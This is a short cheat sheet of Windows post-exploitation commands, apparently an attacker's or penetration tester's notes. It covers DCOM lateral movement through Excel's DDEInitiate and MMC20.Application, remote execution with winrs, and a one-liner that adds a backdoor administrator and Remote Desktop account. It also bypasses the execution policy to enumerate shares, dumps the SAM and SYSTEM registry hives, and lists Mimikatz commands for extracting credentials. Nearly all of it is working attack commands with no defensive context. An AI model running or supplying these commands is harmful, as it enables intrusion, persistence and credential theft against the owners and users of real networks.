
#Will only work with Local admin credentials which are same throughout the network. 
#For this to work in the Windows Advanced Security Firewall  the following ports must be enabled:
#COM+ Network Access (for port 135)
#A rule to let dynamic ports for C:\windows\system32\mmc.exe let in. Regular RPC-EPMAP rules from other services won’t work as they only allow traffic to svchost.exe.
#If the firewall doesn’t let you in, you may receive messages such as:
#Exception calling “CreateInstance” with “1” argument(s): “Retrieving the COM class factory for remote component with CLSID {49B2791A-B1AE-4C90-9B8E-E860BA07F889} from machine target failed due to the following error: 800706ba target.”


powershell -noexit -ExecutionPolicy Unrestricted
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "<Target_IP>"))
$excel.DisplayAlerts = $false
$excel.DDEInitiate("cmd", "/c calc.exe")
.........................................................................................................................................

$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application"))




winrs -r:target netsh.exe winhttp show proxy                  (The advantage is that you get the command’s output back)
.........................................................................................................................................

net localgroup administrators && net user username password /add && net localgroup administrators username /add && net localgroup "Remote Desktop Users" username /add

.........................................................................................................................................

Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass -force;Unblock-File -Path ".\Get-NetworkShares.ps1";Import-Module .\Get-NetworkShares.ps1;.\Get-NetworkShares.ps1 -ComputerName HOSTNAME

.........................................................................................................................................

reg save HKLM\SAM SAM
reg save HKLM\SYSTEM SYSTEM
.........................................................................................................................................

privilege::debug
token::elevate
lsadump::sam
sekurlsa::logonpasswords
